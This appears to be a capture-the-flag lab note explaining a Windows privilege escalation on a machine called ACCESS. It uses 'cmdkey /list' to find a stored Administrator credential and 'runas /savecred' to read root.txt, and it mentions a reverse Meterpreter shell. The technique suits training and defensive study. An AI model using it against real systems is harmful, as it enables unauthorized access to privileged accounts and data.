Runas

Allows a user to run specific tools and programs with different permissions than the user's current logon provides.

cmdkey /list

• cmdkey: A native Windows command-line utility used to create, list, and delete stored usernames and passwords or credentials.

• /list: The specific switch that instructs the utility to display all credentials currently stored on the local computer for the logged-in user.

The primary utility of this command is Credential Enumeration.

In a system administration or security context, it allows a user to see what cached credentials are saved for various targets, such as network shares, domain controllers, or remote desktop connections. As seen in your screenshot, the system has a stored Domain Password for the user ACCESS\Administrator.

We currently have stored credentials.

• runas.exe: A command-line tool that allows a user to run specific tools and programs with different permissions than the user's current logon provides.

• /user:ACCESS\Administrator: Specifies the user account under which the command should run (in this case, the domain administrator for ACCESS).

• /savecred: Instructs Windows to use credentials previously saved by the user. This is critical here because it allows the command to execute without prompting for a password, leveraging the stored credentials identified in your previous cmdkey /list screenshot.

• "C:\Windows\System32\cmd.exe /c ...": This is the argument string. It tells the system to open a command prompt, carry out the specific command following /c, and then terminate.

• TYPE ... > ...: The specific action being performed. It reads the contents of the file root.txt on the Administrator's desktop and redirects (copies) that text into a new file in the security user's directory.

The utility of this command is Privilege Escalation and Data Exfiltration.

In a security testing scenario, once you have identified that a target system has saved credentials for a high-privileged user (like a Domain Admin), you can use runas with the /savecred flag to perform actions that your current "security" user account normally wouldn't have permission to do.

Use with Reverse Meterpreter

If you are currently in a Windows Reverse Meterpreter shell:

1. Identify Saved Creds: You use cmdkey /list to see if the machine "remembers" an admin password.

2. Escalate: You run this runas command to bypass file permissions.

3. Capture the Flag: By copying the root.txt file to a directory you control, you successfully retrieve sensitive data that was restricted to the Administrator account.